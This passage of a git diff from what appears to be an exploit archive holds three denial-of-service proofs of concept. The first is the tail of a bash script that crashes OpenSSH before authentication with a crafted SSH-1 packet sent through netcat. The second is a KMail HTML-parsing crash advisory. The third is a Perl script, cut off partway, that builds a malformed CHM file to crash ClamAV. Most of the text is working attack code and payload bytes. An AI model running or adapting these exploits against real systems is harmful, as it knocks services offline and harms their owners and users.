0x5edef90e 0x29d9c998 0xb0d09822 0xc7d7a8b4 + 0x59b33d17 0x2eb40d81 0xb7bd5c3b 0xc0ba6cad 0xedb88320 0x9abfb3b6 0x03b6e20c + 0x74b1d29a 0xead54739 0x9dd277af 0x04db2615 0x73dc1683 0xe3630b12 0x94643b84 + 0x0d6d6a3e 0x7a6a5aa8 0xe40ecf0b 0x9309ff9d 0x0a00ae27 0x7d079eb1 0xf00f9344 + 0x8708a3d2 0x1e01f268 
0x6906c2fe 0xf762575d 0x806567cb 0x196c3671 0x6e6b06e7 + 0xfed41b76 0x89d32be0 0x10da7a5a 0x67dd4acc 0xf9b9df6f 0x8ebeeff9 0x17b7be43 + 0x60b08ed5 0xd6d6a3e8 0xa1d1937e 0x38d8c2c4 0x4fdff252 0xd1bb67f1 0xa6bc5767 + 0x3fb506dd 0x48b2364b 0xd80d2bda 0xaf0a1b4c 0x36034af6 0x41047a60 0xdf60efc3 + 0xa867df55 0x316e8eef 0x4669be79 0xcb61b38c 0xbc66831a 0x256fd2a0 0x5268e236 + 0xcc0c7795 0xbb0b4703 0x220216b9 0x5505262f 0xc5ba3bbe 0xb2bd0b28 0x2bb45a92 + 0x5cb36a04 0xc2d7ffa7 0xb5d0cf31 0x2cd99e8b 0x5bdeae1d 0x9b64c2b0 0xec63f226 + 0x756aa39c 0x026d930a 0x9c0906a9 0xeb0e363f 0x72076785 0x05005713 0x95bf4a82 + 0xe2b87a14 0x7bb12bae 0x0cb61b38 0x92d28e9b 0xe5d5be0d 0x7cdcefb7 0x0bdbdf21 + 0x86d3d2d4 0xf1d4e242 0x68ddb3f8 0x1fda836e 0x81be16cd 0xf6b9265b 0x6fb077e1 + 0x18b74777 0x88085ae6 0xff0f6a70 0x66063bca 0x11010b5c 0x8f659eff 0xf862ae69 + 0x616bffd3 0x166ccf45 0xa00ae278 0xd70dd2ee 0x4e048354 0x3903b3c2 0xa7672661 + 0xd06016f7 0x4969474d 0x3e6e77db 0xaed16a4a 0xd9d65adc 0x40df0b66 0x37d83bf0 + 0xa9bcae53 0xdebb9ec5 0x47b2cf7f 0x30b5ffe9 0xbdbdf21c 0xcabac28a 0x53b39330 + 0x24b4a3a6 0xbad03605 0xcdd70693 0x54de5729 0x23d967bf 0xb3667a2e 0xc4614ab8 + 0x5d681b02 0x2a6f2b94 0xb40bbe37 0xc30c8ea1 0x5a05df1b 0x2d02ef8d ); + +printf "[*] OpenSSH Pre-Auth DoS PoC by taviso@google.com\n" >&2 +printf "[*] Attacking %s...\n" $hostname >&2 + +# launch netcat coprocess +(nc -q0 $hostname $port < $fifo.in > $fifo.out; rm -f $fifo.in $fifo.out) & + +# open file descriptors to coprocess +exec 3>${fifo}.in 4<${fifo}.out + +# send identification +printf "SSH-1.8-OpenSSH DoS Demo -- taviso@google.com\n" >&3 + +# read server key and spoof bytes (i only care about the spoof bytes) +read server_identification <&4 +printf "[*] remote server identifies as %s.\n" "${server_identification}" >&2 + +# read the cookie +cookie="$(hexdump -n 18 -e '"" 8/1 "%02x " " "'<&4 | cut -d" " -f11-18)" + +printf "[*] IP spoofing cookie was %s.\n" "${cookie}" >&2 + +# now send my response +printf 
"\x00\x00\x08\x3d" >&3 # packet length +printf "\x00\x00\x00\x03" >&3 # packet type +printf "\x03" >&3 # cipher type + +# print spoof bytes +printf "\x${cookie// /\x}" >&3 + +# now calculate checksum of spoof bytes +for i in ${cookie}; do + declare -i buf=0x${i} + let 'crc = crc32tab[(crc ^ buf) & 0xff] ^ (crc >> 8)' +done + +# now send some random crap for padding. +for ((i = 0; i < 2095; i++)); do + printf "\x41" >&3 + let 'crc = crc32tab[(crc ^ 0x41) & 0xff] ^ (crc >> 8)' +done + +printf "[*] checksum should be %#x\n" $crc >&2 + +# now send the checksum to server +printf "$(printf "\\\x%x\\\x%x\\\x%x\\\x%x" $(((crc >> 24) & 0xff)) \ + $(((crc >> 16) & 0xff)) \ + $(((crc >> 8) & 0xff)) \ + $(((crc >> 0) & 0xff)))" >&3 + +printf "\x00\x03\xff\xf8" >&3 # packet length + +# junk +perl -e 'print "\x00"x"262144"' >&3 + +# close file descriptors +exec 3>&- 4<&- + +printf "[*] All done.\n" >&2 + +# milw0rm.com [2006-09-27] diff --git a/platforms/multiple/dos/2515.txt b/platforms/multiple/dos/2515.txt index 59335d7dc..435ef4333 100755 --- a/platforms/multiple/dos/2515.txt +++ b/platforms/multiple/dos/2515.txt 
@@ -1,37 +1,37 @@
-nnp [at] silenthack.co.uk
-http://silenthack.co.uk
-
-Kmail <= 1.9.1 (latest) suffers from a crash when trying to parse an
-incorrectly formatted tag. HTML parsing must be enabled for
-this. This can be done by going to Settings -> Configure Kmail
-->Security -> and tick Prefer HTML to Plain Text.
-
-Copy the following into your local /var/spool/mail/`whoami` or send a
-mail containing the HTML part to cause a crash.
-
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
-
-return-Path:
-X-Original-To: nnp
-Delivered-To: nnp@torvalds
-Received: by torvalds (Postfix, from userid 1000)
- id 2341B7CC25; Sun, 27 Aug 2006 01:03:35 +0100 (IST)
-To: nnp@torvalds
-Message-Id: <20060827000335.2341B7CC25@torvalds>
-Date: Sun, 27 Aug 2006 01:03:35 +0100 (IST)
-Content-Type: text/html
-From: nnp@torvalds (nnp)
-Status: RO
-X-Status: UC
-X-KMail-EncryptionState:
-X-KMail-SignatureState:
-X-KMail-MDN-Sent:
-
-
-
-
-
-
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
-
-# milw0rm.com [2006-10-11]
+nnp [at] silenthack.co.uk
+http://silenthack.co.uk
+
+Kmail <= 1.9.1 (latest) suffers from a crash when trying to parse an
+incorrectly formatted tag. HTML parsing must be enabled for
+this. This can be done by going to Settings -> Configure Kmail
+->Security -> and tick Prefer HTML to Plain Text.
+
+Copy the following into your local /var/spool/mail/`whoami` or send a
+mail containing the HTML part to cause a crash.
+
+#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
+
+return-Path:
+X-Original-To: nnp
+Delivered-To: nnp@torvalds
+Received: by torvalds (Postfix, from userid 1000)
+ id 2341B7CC25; Sun, 27 Aug 2006 01:03:35 +0100 (IST)
+To: nnp@torvalds
+Message-Id: <20060827000335.2341B7CC25@torvalds>
+Date: Sun, 27 Aug 2006 01:03:35 +0100 (IST)
+Content-Type: text/html
+From: nnp@torvalds (nnp)
+Status: RO
+X-Status: UC
+X-KMail-EncryptionState:
+X-KMail-SignatureState:
+X-KMail-MDN-Sent:
+
+
+
+
+
+
+#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
+
+# milw0rm.com [2006-10-11]
diff --git a/platforms/multiple/dos/2586.pl b/platforms/multiple/dos/2586.pl
index f021e88be..a0cd8d832 100755
--- a/platforms/multiple/dos/2586.pl
+++ b/platforms/multiple/dos/2586.pl
@@ -1,188 +1,188 @@ -#!/usr/bin/perl -# -# Clam AntiVirus ClamAV CHM Chunk Name Length DoS Vulnerability -# Took Damian Put's poc and shortened it just a little. -# All credits to Damian Put (pucik[at]gazeta.pl) (pucik[@]overflow.pl) www.overflow.pl -# /str0ke - -my $clam = -"\x49\x54\x53\x46\x03\x00\x00\x00\x60\x00\x00\x00\x01\x00\x00\x00\x4E\x77\xBC\x98\x15\x04\x00\x00\x10". -"\xFD\x01\x7C\xAA\x7B\xD0\x11\x9E\x0C\x00\xA0\xC9\x22\xE6\xEC\x11\xFD\x01\x7C\xAA\x7B\xD0\x11\x9E\x0C". -"\x00\xA0\xC9\x22\xE6\xEC\x60\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00". -"\x00\x00\x00\x00\x00\x54\x30\x00\x00\x00\x00\x00\x00\xCC\x30\x00\x00\x00\x00\x00\x00\xFE\x01\x00\x00". -"\x00\x00\x00\x00\xEB\x19\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x49\x54\x53\x50\x01". -"\x00\x00\x00\x54\x00\x00\x00\x0A\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x02\x00". -"\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xFF\xFF\xFF\xFF\x03\x00\x00\x00\x09\x04\x00\x00\x6A\x92\x02". -"\x5D\x2E\x21\xD0\x11\x9D\xF9\x00\xA0\xC9\x22\xE6\xEC\x54\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF". -"\xFF\xFF\xFF\xFF\x50\x4D\x47\x4C\x53\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x01\xFF\xFF\xFF\x01". -"\x2F\x00\x00\x00\xFF\xC0\xFF\xFF\x44\x58\x48\x44\x52\x01\xCE\xB0\x02\xA0\x00\x08\x2F\x23\x49\x54\x42". -"\x49\x54\x53\x00\x00\x00\x09\x2F\x23\x53\x54\x52\x49\x4E\x47\x53\x01\xCE\xE6\x6B\x8E\x5F\x08\x2F\x23". -"\x53\x59\x53\x54\x45\x4D\x00\x83\x6E\x7F\x08\x2F\x23\x54\x4F\x50\x49\x43\x53\x01\xCE\xD0\x02\x87\x10". -"\x08\x2F\x23\x55\x52\x4C\x53\x54\x52\x01\xCE\xDC\x3E\x8A\x08\x2F\x23\x55\x52\x4C\x54\x42\x4C\x01\xCE". -"\xD7\x12\x85\x2C\x09\x2F\x23\x57\x49\x4E\x44\x4F\x57\x53\x01\xC8\x93\x78\x81\x44\x0B\x2F\x24\x46\x49". -"\x66\x74\x69\x4D\x61\x69\x6E\x01\xC8\xAA\x2B\x86\x85\x57\x09\x2F\x24\x4F\x42\x4A\x49\x4E\x53\x54\x01". -"\x77\x69\x73\x65\x2E\x68\x74\x6D\x01\x8D\xB5\x4C\xA2\x09\x0B\x2F\x73\x6F\x75\x72\x63\x65\x2E\x68\x74". 
-"\x6D\x01\x8D\xD7\x55\x95\x28\x0A\x2F\x73\x74\x61\x72\x74\x2E\x68\x74\x6D\x01\x8D\xEC\x7D\xAF\x0C\x16". -"\x2F\x54\x61\x62\x6C\x65\x20\x6F\x66\x20\x43\x6F\x6E\x74\x65\x6E\x74\x73\x2E\x68\x68\x63\x01\x93\x99". -"\x21\xC8\x6D\x0A\x2F\x74\x6F\x6F\x6C\x73\x2E\x68\x74\x6D\x01\x8E\x9C\x09\xA5\x6D\x14\x2F\x74\x72\x6F". -"\x75\x62\x6C\x65\x73\x68\x6F\x6F\x74\x69\x6E\x67\x2E\x68\x74\x6D\x01\x92\xA8\x25\xC7\x7F\x12\x2F\x75". -"\x70\x64\x61\x74\x65\x5F\x73\x65\x72\x76\x65\x72\x2E\x68\x74\x6D\x01\x8E\xC1\x76\xA1\x57\x0F\x2F\x75". -"\x73\x65\x64\x5F\x66\x69\x6C\x65\x73\x2E\x68\x74\x6D\x01\x90\xD2\x57\xD6\x27\x0E\x2F\x77\x65\x62\x73". -"\x65\x72\x76\x65\x72\x2E\x68\x74\x6D\x01\x90\xBC\x1E\x96\x39\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x3A\x0F\xD6\x0E\x72\x0E\x06\x0E\x8E\x0D\x1D\x0D\xB3\x0C\x5B\x0C\xD9\x0B". -"\x60\x0B\xDD\x0A\x48\x0A\xC8\x09\x4B\x09\xAD\x08\x1E\x08\x88\x07\x04\x07\x80\x06\xFF\x05\x7E\x05\xE2". -"\x04\x4D\x04\xD1\x03\x59\x03\xCE\x02\x45\x02\x98\x01\x47\x01\xE8\x00\x8D\x00\x3D\x00\xA4\x00\x50\x4D". -"\x47\x4C\x43\x0E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x14\x3A\x3A\x44\x61\x74\x61". -"\x53\x70\x61\x63\x65\x2F\x4E\x61\x6D\x65\x4C\x69\x73\x74\x00\x00\x3C\x28\x3A\x3A\x44\x61\x74\x61\x53". -"\x70\x61\x63\x65\x2F\x53\x74\x6F\x72\x61\x67\x65\x2F\x4D\x53\x43\x6F\x6D\x70\x72\x65\x73\x73\x65\x64". -"\x2F\x43\x6F\x6E\x74\x65\x6E\x74\x00\x84\x6D\xB3\xCD\x32\x2C\x3A\x3A\x44\x61\x74\x61\x53\x70\x61\x63". -"\x65\x2F\x53\x74\x6F\x72\x61\x67\x65\x2F\x4D\x53\x43\x6F\x6D\x70\x72\x65\x73\x73\x65\x64\x2F\x43\x6F". -"\x6E\x74\x72\x6F\x6C\x44\x61\x74\x61\x00\x6A\x1C\x29\x3A\x3A\x44\x61\x74\x61\x53\x70\x61\x63\x65\x2F". -"\x53\x74\x6F\x72\x61\x67\x65\x2F\x4D\x53\x43\x6F\x6D\x70\x72\x65\x73\x73\x65\x64\x2F\x53\x70\x61\x6E". -"\x49\x6E\x66\x6F\x00\x62\x08\x2F\x3A\x3A\x44\x61\x74\x61\x53\x70\x61\x63\x65\x2F\x53\x74\x6F\x72\x61". -"\x67\x65\x2F\x4D\x53\x43\x6F\x6D\x70\x72\x65\x73\x73\x65\x64\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D". 
-"\x2F\x4C\x69\x73\x74\x00\x3C\x26\x5F\x3A\x3A\x44\x61\x74\x61\x53\x70\x61\x63\x65\x2F\x53\x74\x6F\x72". -"\x61\x67\x65\x2F\x4D\x53\x43\x6F\x6D\x70\x72\x65\x73\x73\x65\x64\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72". -"\x6D\x2F\x7B\x37\x46\x43\x32\x38\x39\x34\x30\x2D\x39\x44\x33\x31\x2D\x31\x31\x44\x30\x2D\x39\x42\x32". -"\x37\x2D\x30\x30\x41\x30\x43\x39\x31\x45\x39\x43\x37\x43\x7D\x2F\x49\x6E\x73\x74\x61\x6E\x63\x65\x44". -"\x61\x74\x61\x2F\x00\x00\x00\x69\x3A\x3A\x44\x61\x74\x61\x53\x70\x61\x63\x65\x2F\x53\x74\x6F\x72\x61". -"\x67\x65\x2F\x4D\x53\x43\x6F\x6D\x70\x72\x65\x73\x73\x65\x64\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D". -"\x2F\x7B\x37\x46\x43\x32\x38\x39\x34\x30\x2D\x39\x44\x33\x31\x2D\x31\x31\x44\x30\x2D\x39\x42\x32\x37". -"\x2D\x30\x30\x41\x30\x43\x39\x31\x45\x39\x43\x37\x43\x7D\x2F\x49\x6E\x73\x74\x61\x6E\x63\x65\x44\x61". -"\x74\x61\x2F\x52\x65\x73\x65\x74\x54\x61\x62\x6C\x65\x00\x81\x06\x82\x68\x65\x72\x76\x65\x72\x2E\x6A". -"\x70\x67\x01\xBC\xBB\x6B\x9F\x59\x1F\x2F\x69\x6D\x67\x2F\x32\x32\x62\x5F\x65\x6E\x5F\x73\x65\x72\x76". -"\x65\x72\x5F\x70\x72\x69\x6F\x72\x69\x74\x79\x2E\x6A\x70\x67\x01\xAE\xE3\x7F\xFE\x1E\x20\x2F\x69\x6D". -"\x67\x2F\x32\x32\x62\x5F\x65\x6E\x5F\x75\x70\x64\x61\x74\x65\x5F\x73\x65\x72\x76\x65\x72\x6D\x65\x74". -"\x2E\x6A\x70\x67\x01\x95\x9B\x4B\x97\x7E\x1B\x2F\x69\x6D\x67\x2F\x32\x35\x61\x5F\x63\x6F\x6E\x74\x65". -"\x78\x74\x5F\x73\x6F\x75\x72\x63\x65\x2E\x6A\x70\x67\x01\x96\x89\x38\xB7\x30\x17\x2F\x69\x6D\x67\x2F". -"\x32\x35\x61\x5F\x71\x75\x65\x75\x65\x5F\x6C\x69\x73\x74\x2E\x6A\x70\x67\x01\xB1\xD9\x01\xF4\x37\x23". -"\x2F\x69\x6D\x67\x2F\x32\x35\x62\x5F\x70\x72\x65\x66\x5F\x73\x65\x72\x76\x65\x72\x5F\x6C\x69\x73\x74". -"\x62\x75\x74\x74\x6F\x6E\x2E\x6A\x70\x67\x01\xAE\xD9\x75\x8A\x0A\x10\x2F\x69\x6D\x67\x2F\x61\x64\x64". -"\x72\x65\x6D\x31\x2E\x67\x69\x66\x01\x99\xF0\x34\x81\x98\x4D\x10\x2F\x69\x6D\x67\x2F\x61\x64\x64\x72". -"\x65\x6D\x32\x2E\x67\x69\x66\x01\x9B\x89\x01\xFF\x6E\x0E\x2F\x69\x6D\x67\x2F\x61\x72\x72\x6F\x77\x2E". 
-"\x67\x69\x66\x01\xC0\xAF\x70\x3E\x15\x2F\x69\x6D\x67\x2F\x62\x61\x72\x5F\x6F\x62\x74\x61\x69\x6E\x65". -"\x64\x2E\x6A\x70\x67\x01\xB1\xC5\x59\x89\x76\x18\x2F\x69\x6D\x67\x2F\x62\x61\x72\x5F\x73\x68\x61\x72". -"\x65\x64\x66\x69\x6C\x65\x73\x2E\x6A\x70\x67\x01\xB1\xCF\x4F\x89\x32\x18\x2F\x69\x6D\x67\x2F\x62\x61". -"\x72\x5F\x73\x6F\x75\x72\x63\x65\x5F\x66\x6C\x61\x74\x2E\x6A\x70\x67\x01\xB1\xAA\x10\x8F\x24\x1A\x2F". -"\x69\x6D\x67\x2F\x62\x61\x72\x5F\x73\x6F\x75\x72\x63\x65\x5F\x73\x68\x61\x64\x65\x64\x2E\x6A\x70\x67". -"\x01\xB1\xB9\x34\x8C\x25\x13\x2F\x69\x6D\x67\x2F\x62\x6E\x5F\x63\x6F\x6E\x6E\x65\x63\x74\x2E\x6A\x70". -"\x67\x01\x95\xB3\x49\x89\x2D\x0B\x2F\x69\x6D\x67\x2F\x62\x72\x2E\x6A\x70\x67\x01\xB9\xBB\x07\xBB\x69". -"\x01\xB1\x98\x4F\x91\x41\x1C\x2F\x69\x6D\x67\x2F\x65\x44\x32\x4B\x6C\x69\x6E\x6B\x73\x5F\x75\x6E\x63". -"\x68\x65\x63\x6B\x65\x64\x2E\x6A\x70\x67\x01\x93\xE2\x0E\x8C\x74\x16\x2F\x69\x6D\x67\x2F\x65\x44\x6F". -"\x6E\x6B\x65\x79\x48\x79\x62\x72\x69\x64\x2E\x6A\x70\x67\x01\x97\xE7\x48\x87\x34\x17\x2F\x69\x6D\x67". -"\x2F\x66\x69\x65\x6E\x64\x73\x5F\x63\x6F\x6E\x74\x65\x78\x74\x2E\x6A\x70\x67\x01\x96\xC0\x68\xC6\x09". -"\x69\x6D\x67\x2F\x66\x72\x69\x65\x6E\x64\x73\x33\x2E\x6A\x70\x67\x01\x97\x86\x71\x8A\x1E\x0B\x2F\x69". -"\x6D\x67\x2F\x69\x70\x2E\x67\x69\x66\x01\x9D\x8B\x29\xA5\x2D\x1D\x2F\x69\x6D\x67\x2F\x6C\x69\x6E\x6B". -"\x73\x79\x73\x5F\x70\x6F\x72\x74\x5F\x74\x72\x69\x67\x67\x65\x72\x2E\x6A\x70\x67\x01\xA1\xD2\x1E\x82". -"\xEB\x4F\x13\x2F\x69\x6D\x67\x2F\x6C\x69\x73\x74\x5F\x6B\x6E\x6F\x77\x6E\x2E\x6A\x70\x67\x01\xC0\xBD". -"\x4E\x8E\x03\x15\x2F\x69\x6D\x67\x2F\x6C\x69\x73\x74\x5F\x6F\x6E\x71\x75\x65\x75\x65\x2E\x6A\x70\x67". -"\x01\xC0\xB0\x2E\x8D\x20\x14\x2F\x69\x6D\x67\x2F\x6C\x69\x73\x74\x5F\x75\x70\x6C\x6F\x61\x64\x2E\x6A". -"\x70\x67\x01\xC0\xA2\x43\x8D\x2D\x0F\x2F\x69\x6D\x67\x2F\x6D\x6C\x64\x6F\x6E\x6B\x2E\x6A\x70\x67\x01". -"\x97\xDC\x76\x85\x21\x11\x2F\x69\x6D\x67\x2F\x6D\x70\x65\x6E\x64\x69\x6E\x67\x2E\x6A\x70\x67\x01\x97". 
-"\xC0\x51\x85\x15\x15\x2F\x69\x6D\x67\x2F\x6D\x75\x6C\x65\x5F\x54\x72\x5F\x67\x72\x65\x79\x2E\x6A\x70". -"\x67\x01\x98\xA8\x6E\x85\x16\x16\x2F\x69\x6D\x67\x2F\x6D\x75\x6C\x65\x5F\x54\x72\x5F\x4C\x6F\x77\x49". -"\x44\x2E\x6A\x70\x67\x01\x98\xA0\x10\x88\x5E\x16\x2F\x69\x6D\x67\x2F\x6D\x75\x6C\x65\x5F\x54\x72\x61". -"\x79\x49\x63\x6F\x6E\x2E\x6A\x70\x67\x01\x98\x9A\x69\x85\x27\x10\x2F\x69\x6D\x67\x2F\x6E\x65\x74\x63". -"\x6F\x6E\x73\x2E\x67\x69\x66\x01\x99\xAB\x77\xC4\x3D\x10\x2F\x69\x6D\x67\x2F\x6E\x65\x75\x74\x72\x61". -"\x6C\x2E\x6A\x70\x67\x01\x97\xC5\x66\x85\x08\x15\x2F\x69\x6D\x67\x2F\x6E\x6F\x74\x63\x6F\x6E\x6E\x65". -"\x63\x74\x65\x64\x2E\x6A\x70\x67\x01\x98\x92\x7E\x87\x6B\x0D\x2F\x69\x6D\x67\x2F\x70\x6C\x75\x73\x2E". -"\x6A\x70\x67\x01\x97\xD2\x2E\x85\x1E\x12\x2F\x69\x6D\x67\x2F\x70\x6C\x75\x73\x63\x6F\x6D\x70\x61\x2E". -"\x6A\x70\x67\x01\x97\xD7\x4C\x85\x2A\x1A\x2F\x69\x6D\x67\x2F\x70\x6C\x75\x73\x65\x44\x6F\x6E\x6B\x65". -"\x79\x48\x79\x62\x72\x69\x64\x2E\x6A\x70\x67\x01\x97\xEE\x7C\x85\x2B\x13\x2F\x69\x6D\x67\x2F\x70\x6C". -"\x75\x73\x6D\x6C\x64\x6F\x6E\x6B\x2E\x6A\x70\x67\x01\x97\xE2\x17\x85\x31\x15\x2F\x69\x6D\x67\x2F\x70". -"\x6C\x75\x73\x73\x68\x61\x72\x65\x61\x7A\x61\x2E\x6A\x70\x67\x01\x97\xFE\x09\x8A\x09\x18\x2F\x69\x6D". -"\x67\x2F\x70\x72\x65\x66\x5F\x63\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x2E\x6A\x70\x67\x01\xA4\xBD\x6D". -"\x81\x82\x76\x19\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73". -"\x2E\x6A\x70\x67\x01\xA5\xC0\x63\x81\xA9\x2F\x15\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x64\x69\x73". -"\x70\x6C\x61\x79\x2E\x6A\x70\x67\x01\xC0\xCB\x51\xF9\x6D\x16\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F". -"\x65\x78\x74\x65\x6E\x64\x65\x64\x2E\x6A\x70\x67\x01\xA6\xEA\x12\x82\x81\x64\x13\x2F\x69\x6D\x67\x2F". -"\x70\x72\x65\x66\x5F\x66\x69\x6C\x65\x73\x2E\x6A\x70\x67\x01\xA8\xEB\x76\x82\x8E\x42\x15\x2F\x69\x6D". -"\x67\x2F\x70\x72\x65\x66\x5F\x67\x65\x6E\x65\x72\x61\x6C\x2E\x6A\x70\x67\x01\xAA\xFA\x38\xF8\x28\x11". 
-"\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x69\x72\x63\x2E\x6A\x70\x67\x01\xAB\xF2\x60\x81\x87\x1C\x1B". -"\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x6E\x6F\x74\x69\x66\x69\x63\x61\x74\x69\x6F\x6E\x73\x2E\x6A". -"\x70\x67\x01\xAC\xF9\x7C\xE1\x22\x13\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x70\x72\x6F\x78\x79\x2E". -"\x6A\x70\x67\x01\xC3\xEC\x68\xD4\x4B\x17\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x73\x63\x68\x65\x64". -"\x75\x6C\x65\x72\x2E\x6A\x70\x67\x01\xC4\xC1\x33\xEB\x4E\x16\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F". -"\x53\x65\x63\x75\x72\x69\x74\x79\x2E\x6A\x70\x67\x01\xBC\xDB\x44\x81\xD4\x19\x14\x2F\x69\x6D\x67\x2F". -"\x70\x72\x65\x66\x5F\x73\x65\x72\x76\x65\x72\x2E\x6A\x70\x67\x01\xAD\xDB\x1E\xFE\x57\x18\x2F\x69\x6D". -"\x67\x2F\x70\x72\x65\x66\x5F\x73\x74\x61\x74\x69\x73\x74\x69\x63\x73\x2E\x6A\x70\x67\x01\xAF\xE2\x1D". -"\x81\xA4\x57\x17\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x77\x65\x62\x73\x65\x72\x76\x65\x72\x2E\x6A". -"\x70\x67\x01\xC1\xC5\x3E\xD1\x79\x1F\x2F\x69\x6D\x67\x2F\x50\x72\x65\x66\x65\x72\x65\x6E\x63\x65\x73". -"\x5F\x32\x34\x62\x5F\x77\x69\x7A\x61\x72\x64\x2E\x6A\x70\x67\x01\x93\xEF\x02\x81\xAC\x49\x0E\x2F\x69". -"\x6D\x67\x2F\x72\x61\x6E\x67\x65\x2E\x67\x69\x66\x01\xA0\xE0\x32\xF1\x6C\x0F\x2F\x69\x6D\x67\x2F\x52". -"\x61\x74\x69\x6E\x67\x2E\x6A\x70\x67\x01\x98\xAE\x04\x85\x2E\x13\x2F\x69\x6D\x67\x2F\x52\x61\x74\x69". -"\x6E\x67\x5F\x62\x61\x64\x2E\x6A\x70\x67\x01\x98\xB3\x32\x85\x49\x15\x2F\x69\x6D\x67\x2F\x73\x65\x63". -"\x75\x72\x65\x5F\x68\x61\x73\x68\x31\x2E\x6A\x70\x67\x01\xC5\xFB\x29\xB2\x58\x15\x2F\x69\x6D\x67\x2F". -"\x73\x65\x63\x75\x72\x65\x5F\x68\x61\x73\x68\x32\x2E\x6A\x70\x67\x01\xC6\xAE\x01\xDA\x3A\x15\x2F\x69". -"\x6D\x67\x2F\x73\x65\x63\x75\x72\x65\x5F\x68\x61\x73\x68\x33\x2E\x6A\x70\x67\x01\xC7\x88\x3B\xC9\x4B". -"\x15\x2F\x69\x6D\x67\x2F\x73\x65\x63\x75\x72\x65\x5F\x68\x61\x73\x68\x34\x2E\x6A\x70\x67\x01\xC7\xD2". -"\x06\xC1\x72\x11\x2F\x69\x6D\x67\x2F\x73\x65\x74\x74\x69\x6E\x67\x31\x2E\x67\x69\x66\x01\x9E\x86\x5C". 
-"\xCA\x7F\x11\x2F\x69\x6D\x67\x2F\x73\x65\x74\x74\x69\x6E\x67\x32\x2E\x67\x69\x66\x01\x9F\x9C\x53\xDE". -"\x69\x11\x2F\x69\x6D\x67\x2F\x73\x65\x74\x74\x69\x6E\x67\x33\x2E\x67\x69\x66\x01\x9E\xD1\x5B\xCA\x78". -"\x11\x2F\x69\x6D\x67\x2F\x53\x68\x61\x72\x65\x61\x7A\x61\x2E\x6A\x70\x67\x01\x97\xF4\x27\x89\x62\x15". -"\x2F\x69\x6D\x67\x2F\x53\x4D\x43\x37\x30\x30\x34\x41\x42\x52\x5F\x31\x2E\x6A\x70\x67\x01\xB2\xCD\x38". -"\x81\xD8\x44\x19\x2F\x69\x6D\x67\x2F\x53\x4D\x43\x37\x30\x30\x34\x41\x42\x52\x5F\x32\x5F\x77\x32\x6B". -"\x2E\x6A\x70\x67\x01\xB4\xA5\x7C\x81\xEA\x68\x19\x2F\x69\x6D\x67\x2F\x53\x4D\x43\x37\x30\x30\x34\x41". -"\x42\x52\x5F\x32\x5F\x77\x39\x78\x2E\x6A\x70\x67\x01\xB6\x90\x64\x81\xF8\x31\x17\x2F\x69\x6D\x67\x2F". -"\x53\x4D\x43\x37\x30\x30\x34\x41\x42\x52\x5F\x33\x2E\x31\x2E\x6A\x70\x67\x01\xB8\x89\x15\xB1\x2B\x17". -"\x2F\x69\x6D\x67\x2F\x53\x4D\x43\x37\x30\x30\x34\x41\x42\x52\x5F\x33\x2E\x32\x2E\x6A\x70\x67\x01\xB8". -"\xBA\x40\x81\x80\x47\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x31\x2E\x67\x69\x66\x01". -"\xB9\xF6\x70\xA3\x57\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x32\x2E\x67\x69\x66\x01". -"\xBA\x9A\x47\x9B\x5E\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x33\x2E\x67\x69\x66\x01". -"\xBA\xB6\x25\xA7\x13\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x35\x2E\x67\x69\x66\x01". -"\xBA\xDD\x38\xB7\x07\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x36\x2E\x67\x69\x66\x01". -"\xBB\x94\x3F\xAF\x06\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x37\x2E\x67\x69\x66\x01". -"\xBB\xC3\x45\x8E\x33\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x38\x2E\x67\x69\x66\x01". -"\xBB\xD1\x78\xE9\x73\x13\x2F\x69\x6D\x67\x2F\x53\x74\x61\x74\x75\x73\x5F\x42\x61\x72\x2E\x6A\x70\x67". -"\x01\x95\xBC\x76\xBC\x23\x0D\x2F\x69\x6D\x67\x2F\x74\x61\x62\x73\x2E\x67\x69\x66\x01\x9F\xFB\x3C\xA0". -"\x00\x0F\x2F\x69\x6D\x67\x2F\x75\x70\x6E\x70\x6F\x6E\x2E\x67\x69\x66\x01\x9C\x88\x6F\xCD\x51\x18\x2F". 
